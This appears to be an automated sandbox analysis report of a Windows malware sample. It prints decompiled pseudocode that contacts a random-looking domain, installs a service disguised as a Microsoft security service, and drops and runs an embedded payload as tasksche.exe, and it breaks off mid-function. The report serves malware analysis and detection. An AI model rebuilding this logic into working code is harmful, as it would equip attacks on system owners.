                    • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45networkCOMMON
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t27;

				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com", 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t27 = _t13;
				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
				_push(_t27);
				InternetCloseHandle(); // executed
				InternetCloseHandle(0);
				E00408090();
				return 0;
			}















                    0x00408155
                    0x00408157
                    0x00408158
                    0x0040815c
                    0x00408160
                    0x00408164
                    0x00408168
                    0x0040816c
                    0x00408177
                    0x0040817b
                    0x0040818e
                    0x00408194
                    0x0040819c
                    0x004081a7
                    0x004081ab
                    0x004081ad
                    0x004081b9

                    APIs
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                    • InternetCloseHandle.WININET(00000000), ref: 004081A7
                    • InternetCloseHandle.WININET(00000000), ref: 004081AB
                      • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                      • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                    Strings
                    • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com, xrefs: 0040814A
                    Memory Dump Source
                    • Source File: 00000000.00000002.311239358.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.311223440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311264368.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311276145.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311287084.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311406750.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311470610.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311960326.0000000000850000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                    • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                    • API String ID: 774561529-2614457033
                    • Opcode ID: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
                    • Instruction ID: 3b8a91e0baa4f3639afdb349cfc438007093f0a6557163af6b5eb03d237fc32a
                    • Opcode Fuzzy Hash: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
                    • Instruction Fuzzy Hash: B3018671548310AEE310DF748D01B6B7BE9EF85710F01082EF984F72C0EAB59804876B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54serviceCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00407C40() {
				char _v260;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", 0x70f760);
				_t15 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.1", "Microsoft Security Center (2.1) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}






                    0x00407c56
                    0x00407c6e
                    0x00407c72
                    0x00407cd3
                    0x00407c74
                    0x00407ca7
                    0x00407cab
                    0x00407cb2
                    0x00407cb9
                    0x00407cb9
                    0x00407cbc
                    0x00407cc9
                    0x00407cc9

                    APIs
                    • sprintf.MSVCRT ref: 00407C56
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                    • CreateServiceA.ADVAPI32(00000000,mssecsvc2.1,Microsoft Security Center (2.1) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6FFFFB10,00000000), ref: 00407C9B
                    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.311239358.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.311223440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311264368.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311276145.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311287084.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311406750.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311470610.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311960326.0000000000850000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                    • String ID: %s -m security$Microsoft Security Center (2.1) Service$mssecsvc2.1
                    • API String ID: 3340711343-2450984573
                    • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                    • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                    • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                    • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49serviceCOMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t19 = OpenSCManagerA(0, 0, 0xf003f);
					__eflags = _t19;
					if(_t19 != 0) {
						_t22 = OpenServiceA(_t19, "mssecsvc2.1", 0xf01ff);
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.1";
					_v12 = 0x408000;
					_v8 = 0;
					_v4 = 0;
					return StartServiceCtrlDispatcherA( &_v16);
				} else {
					return E00407F20(_t26);
				}
			}










                    0x0040809f
                    0x004080a5
                    0x004080ab
                    0x004080ae
                    0x004080c9
                    0x004080cb
                    0x004080cd
                    0x004080e8
                    0x004080ea
                    0x004080ec
                    0x004080f1
                    0x004080fa
                    0x004080fa
                    0x004080fd
                    0x00408100
                    0x00408105
                    0x0040810e
                    0x00408116
                    0x0040811e
                    0x00408130
                    0x004080b0
                    0x004080b8
                    0x004080b8

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                    • __p___argc.MSVCRT ref: 004080A5
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                    • OpenServiceA.ADVAPI32(00000000,mssecsvc2.1,000F01FF,6FFFFB10,00000000,?,004081B2), ref: 004080DC
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                    • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                    • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.311239358.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.311223440.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311264368.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311276145.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311287084.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311406750.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311470610.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.311960326.0000000000850000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                    • String ID: mssecsvc2.1
                    • API String ID: 4274534310-2839763450
                    • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                    • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                    • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                    • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49serviceCOMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				int _t9;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t19 = OpenSCManagerA(0, 0, 0xf003f);
					__eflags = _t19;
					if(_t19 != 0) {
						_t22 = OpenServiceA(_t19, "mssecsvc2.1", 0xf01ff);
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.1";
					_v12 = 0x408000;
					_v8 = 0;
					_v4 = 0;
					_t9 = StartServiceCtrlDispatcherA( &_v16); // executed
					return _t9;
				} else {
					return E00407F20(_t26);
				}
			}











                    0x0040809f
                    0x004080a5
                    0x004080ab
                    0x004080ae
                    0x004080c9
                    0x004080cb
                    0x004080cd
                    0x004080e8
                    0x004080ea
                    0x004080ec
                    0x004080f1
                    0x004080fa
                    0x004080fa
                    0x004080fd
                    0x00408100
                    0x00408105
                    0x0040810e
                    0x00408116
                    0x0040811e
                    0x00408126
                    0x00408130
                    0x004080b0
                    0x004080b8
                    0x004080b8

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                    • __p___argc.MSVCRT ref: 004080A5
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                    • OpenServiceA.ADVAPI32(00000000,mssecsvc2.1,000F01FF,6FFFFB10,00000000,?,004081B2), ref: 004080DC
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                    • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                    • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.575658482.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.575654169.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575666835.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575671464.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575679019.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575695707.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575701260.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575706917.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575749236.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575885693.0000000000850000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                    • String ID: mssecsvc2.1
                    • API String ID: 4274534310-2839763450
                    • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                    • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                    • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                    • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                    Download Yara Rule
                    C-Code - Quality: 71%
                    			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}
























                    0x00409a19
                    0x00409a1b
                    0x00409a20
                    0x00409a2b
                    0x00409a2c
                    0x00409a39
                    0x00409a3e
                    0x00409a43
                    0x00409a4a
                    0x00409a51
                    0x00409a64
                    0x00409a72
                    0x00409a7b
                    0x00409a80
                    0x00409a85
                    0x00409a8b
                    0x00409a92
                    0x00409a98
                    0x00409a99
                    0x00409a9e
                    0x00409aa3
                    0x00409aa8
                    0x00409ab2
                    0x00409acb
                    0x00409ad1
                    0x00409ad6
                    0x00409adb
                    0x00409ae8
                    0x00409aea
                    0x00409af0
                    0x00409b2c
                    0x00409b31
                    0x00409b32
                    0x00409b32
                    0x00409af2
                    0x00409af2
                    0x00409af2
                    0x00409af3
                    0x00409af6
                    0x00409af8
                    0x00409b03
                    0x00409b05
                    0x00409b05
                    0x00409b06
                    0x00409b06
                    0x00409b03
                    0x00409b09
                    0x00409b0d
                    0x00000000
                    0x00000000
                    0x00409b13
                    0x00409b1a
                    0x00409b24
                    0x00409b39
                    0x00409b26
                    0x00409b26
                    0x00409b26
                    0x00409b3a
                    0x00409b3b
                    0x00409b3c
                    0x00409b44
                    0x00409b45
                    0x00409b4a
                    0x00409b4e
                    0x00409b54
                    0x00409b59
                    0x00409b5b
                    0x00409b5e
                    0x00409b5f
                    0x00409b60
                    0x00409b67

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.575658482.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.575654169.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575666835.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575671464.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575679019.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575695707.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575701260.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575706917.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575749236.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575885693.0000000000850000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                    • String ID:
                    • API String ID: 801014965-0
                    • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                    • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                    • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                    • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45networkCOMMON
                    Download Yara Rule
                    C-Code - Quality: 77%
                    			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t27;

				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com", 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t27 = _t13;
				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
				_push(_t27);
				InternetCloseHandle(); // executed
				InternetCloseHandle(0);
				E00408090();
				return 0;
			}















                    0x00408155
                    0x00408157
                    0x00408158
                    0x0040815c
                    0x00408160
                    0x00408164
                    0x00408168
                    0x0040816c
                    0x00408177
                    0x0040817b
                    0x0040818e
                    0x00408194
                    0x0040819c
                    0x004081a7
                    0x004081ab
                    0x004081ad
                    0x004081b9

                    APIs
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                    • InternetCloseHandle.WININET(00000000), ref: 004081A7
                    • InternetCloseHandle.WININET(00000000), ref: 004081AB
                      • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                      • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                    Strings
                    • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com, xrefs: 0040814A
                    Memory Dump Source
                    • Source File: 00000001.00000002.575658482.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.575654169.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575666835.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575671464.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575679019.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575695707.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575701260.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575706917.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575749236.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575885693.0000000000850000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                    • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                    • API String ID: 774561529-2614457033
                    • Opcode ID: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
                    • Instruction ID: 3b8a91e0baa4f3639afdb349cfc438007093f0a6557163af6b5eb03d237fc32a
                    • Opcode Fuzzy Hash: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
                    • Instruction Fuzzy Hash: B3018671548310AEE310DF748D01B6B7BE9EF85710F01082EF984F72C0EAB59804876B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54serviceCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00407C40() {
				char _v260;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", 0x70f760);
				_t15 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.1", "Microsoft Security Center (2.1) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}






                    0x00407c56
                    0x00407c6e
                    0x00407c72
                    0x00407cd3
                    0x00407c74
                    0x00407ca7
                    0x00407cab
                    0x00407cb2
                    0x00407cb9
                    0x00407cb9
                    0x00407cbc
                    0x00407cc9
                    0x00407cc9

                    APIs
                    • sprintf.MSVCRT ref: 00407C56
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                    • CreateServiceA.ADVAPI32(00000000,mssecsvc2.1,Microsoft Security Center (2.1) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6FFFFB10,00000000), ref: 00407C9B
                    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.575658482.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.575654169.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575666835.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575671464.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575679019.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575695707.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575701260.000000000042F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575706917.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575749236.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000001.00000002.575885693.0000000000850000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                    • String ID: %s -m security$Microsoft Security Center (2.1) Service$mssecsvc2.1
                    • API String ID: 3340711343-2450984573
                    • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                    • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                    • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                    • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407CE0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 175libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 36%
                    			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				char _v572;
				short _v592;
				intOrPtr _v596;
				void* _v608;
				void _v636;
				char _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				char _v656;
				intOrPtr _v692;
				intOrPtr _v700;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				intOrPtr _t64;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					_t64 =  *0x431478; // 0x0
					 *0x43144c = _t36;
					if(_t64 != 0) {
						_t121 =  *0x431458; // 0x0
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x0
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1);
												_t107 =  *0x431458( &_v520, 0x40000000, 0, 0, 2, 4, 0);
												if(_t107 != 0xffffffff) {
													 *0x431460(_t107, _v636, _t109,  &_v636, 0);
													 *0x43144c(_t107);
													_v652 = 0;
													_v648 = 0;
													_v644 = 0;
													memset( &_v636, 0, 0x10 << 2);
													asm("repne scasb");
													_v656 = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v572 - 1, _t108, 0 << 2);
													_push( &_v656);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_push( &_v640);
													_push(0);
													_push(0);
													_push(0x8000000);
													_push(0);
													_push(0);
													_push(0);
													_push( &_v572);
													_push(0);
													_v640 = 0x44;
													_v592 = 0;
													_v596 = 0x81;
													if( *0x431478() != 0) {
